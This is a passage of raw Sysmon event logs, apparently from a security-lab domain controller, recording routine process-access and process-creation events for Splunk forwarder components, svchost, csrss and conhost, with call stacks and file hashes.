Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.568{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.176{59A5CD1D-901C-6005-0C01-00000000A301}29362316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 